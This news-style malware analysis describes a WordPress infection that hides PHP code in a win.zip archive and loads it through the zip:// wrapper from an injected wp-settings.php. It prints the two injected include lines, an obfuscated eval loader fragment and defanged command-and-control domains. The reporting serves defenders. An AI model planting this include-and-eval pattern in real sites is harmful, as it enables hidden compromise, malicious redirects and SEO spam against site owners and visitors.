“`html
Cybersecurity analysts have discovered a sophisticated malware operation focusing on WordPress sites via an inventive ZIP archive-based assault method.
The malware, initially identified in July 2025, signifies a notable progression in web-based dangers, utilizing advanced obfuscation techniques and inconspicuous persistence tactics to reroute unsuspecting users to harmful domains while concurrently engaging in search engine optimization deception activities.
The assault initiates with the infiltration of essential WordPress files, particularly targeting the crucial wp-settings.php component.
.webp)
Upon gaining access, attackers inject malevolent code that exploits PHP’s zip:// wrapper capability to execute concealed payloads.
This strategy permits the malware to remain almost undetected by conventional security scanners, as the harmful code resides within what seems to be a benign ZIP archive file named win.zip.
The malware’s main aims extend beyond mere redirection schemes. It orchestrates a thorough assault on search engine rankings via unauthorized content insertion, sitemap adjustments, and the formation of spam-ridden pages designed to elevate harmful websites in search outcomes.
The infection displays impressive sophistication in its capability to differentiate between genuine visitors and automated bots, assuring that search engine crawlers encounter harmless content while actual users are subjected to malign redirects.
Sucuri experts discovered the malware after examining persistent redirect concerns reported by a client, leading to the unearthing of this multi-layered hazard.
The analysts indicated that the malware utilizes dynamic Command and Control server selection, with distinct C2 domains activated based on specific URL patterns encountered by visitors.
ZIP Archive Inclusion Mechanism
The malware’s most innovative aspect lies in its utilization of PHP’s zip:// stream wrapper for code inclusion. The initial payload, injected into wp-settings.php, comprises two essential lines that establish the framework for infection:-
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
include('zip://win.zip#' . $h);This code extracts the domain name from the HTTP_HOST header and utilizes it to include a file directly from within the win.zip archive.
.webp)
The tactic circumvents traditional file-based detection measures as the malicious code dwells within a compressed container instead of being standalone PHP files.
Upon extraction, the ZIP archive exposes heavily obfuscated PHP code structured as:-
$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);The malware achieves persistence through environment manipulation, setting prolonged execution timeouts and implementing anti-bot detection strategies.
.webp)
It dynamically chooses from multiple Command and Control servers, including domains like wditemqy[.]enturbioaj[.]xyz and oqmetrix[.]icercanokt[.]xyz, depending on the requested URL path.
This distributed C2 architecture bolsters the malware’s endurance against elimination efforts while facilitating targeted content delivery based on visitor behavior affinities.
“`